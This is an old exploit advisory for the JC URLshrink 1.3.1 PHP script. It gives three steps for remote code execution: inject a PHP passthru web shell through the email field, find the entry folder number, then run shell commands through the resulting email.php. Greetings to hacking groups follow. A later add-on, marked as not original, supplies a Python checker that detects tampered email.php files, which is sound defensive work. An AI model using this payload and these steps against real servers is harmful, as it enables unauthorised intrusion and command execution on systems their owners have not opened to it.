# Title : JC URLshrink 1.3.1 Remote Code Execution Vulnerability
# Published : 2007-03-30
# Author : Dj7xpl
.-""""""""-.
/ Dj7xpl
| |
|, .-. .-. ,|
| )(_o/ o_)( |
|/ / |
(@_ (_ ^^ _)
_ ) _________|IIIIII|__/_______________________________
(_)@8@8{}<________|-IIIIII/-|________________________________>
)_/ /
(@
+_______________________________________________Iranian Are The Best In World___________________________________________+
+
+ /*************************__I N F O__**************************
+ |* *|
+ |* U R L S H R I N K *|
+ |* *|
+ |* Portal: Urlshrink *|
+ |* Version: 1.3.1 *|
+ |* Release: 26-07-2006 *|
+ |* www: www.developers.jccorp.net *|
+ |* Author: Dj7xpl | Dj7xpl@yahoo.com *|
+ |* *|
+ **************************************************************/
+_______________________________________________________________________________________________________________________+
+________________________________________________________E X P L O I T__________________________________________________+
+
+
+ E X P L O I T - -
+ --------------
+
+ 1) Insert Bad Code
+
+ [X] Enter Your URL to shrink: (Enter Random Url) E.g : milw0m.com
+ [X] Enter your Email Address: (Enter Bad Code) E.g : <?php passthru($_GET[cmd]);?>
+
+
+
+ 2) See Folder Name
+
+ [X] http://[Target]/[Path]/data/tally.php
+ [X] http://localhost/urlshrink/data/tally.php E.g : 5
+
+
+
+ 3) Visit Your Code
+
+ [X] http://localhost/urlshrink/[Folder Name]/email.php
+ E.g : http://localhost/urlshrink/5/email.php?cmd=ls -la
+
+
+
+
+_______________________________________________________________________________________________________________________+
+___________________________________________________________T N X_______________________________________________________+
+
+
+ Sp Tnx : Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org, Simorgh .............
+
+_______________________________________________________________________________________________________________________+
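Defender-side check for the issue described above, added here as an example (not part of the original advisory or of URLshrink's code): it walks an install directory and flags numbered entry folders whose email.php contains a PHP open tag or anything other than a plain address. The expectation that a clean email.php holds only the address, the sample tree, and all function names are assumptions made for the example.

```python
import re
import tempfile
from pathlib import Path

# Assumption (not from the advisory): a clean email.php holds only the address.
PLAIN_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
PHP_OPEN_TAG = re.compile(r"<\?(php|=|\s|$)", re.IGNORECASE)


def audit_install(root):
    """Return (relative_path, finding) pairs for suspicious email.php files."""
    findings = []
    for folder in sorted(Path(root).iterdir()):
        # Per the advisory, entry folders are named by the counter shown in
        # data/tally.php, so only all-digit directory names are inspected.
        target = folder / "email.php"
        if not folder.name.isdigit() or not target.is_file():
            continue
        body = target.read_text(encoding="utf-8", errors="replace").strip()
        rel = f"{folder.name}/email.php"
        if PHP_OPEN_TAG.search(body):
            findings.append((rel, "php-open-tag"))
        elif not PLAIN_EMAIL.fullmatch(body):
            findings.append((rel, "not-an-email"))
    return findings


def build_sample_tree(root):
    """Constructed sample data: one clean entry, two tampered, one non-entry dir."""
    samples = {
        "3": "alice@example.org\n",
        "4": "not an address\n",
        "5": "<?php /* constructed marker, no payload */ ?>\n",
        "data": "<?php /* ignored: folder name is not numeric */ ?>\n",
    }
    for folder, body in samples.items():
        target = Path(root, folder)
        target.mkdir()
        (target / "email.php").write_text(body, encoding="utf-8")


def run_demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return audit_install(root)


if __name__ == "__main__":
    for rel_path, finding in run_demo():
        print(f"{rel_path}: {finding}")
```

To audit a real deployment, call audit_install() with the directory that contains the numbered folders and review every reported file by hand.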
# www.Syue.com [2007-03-30]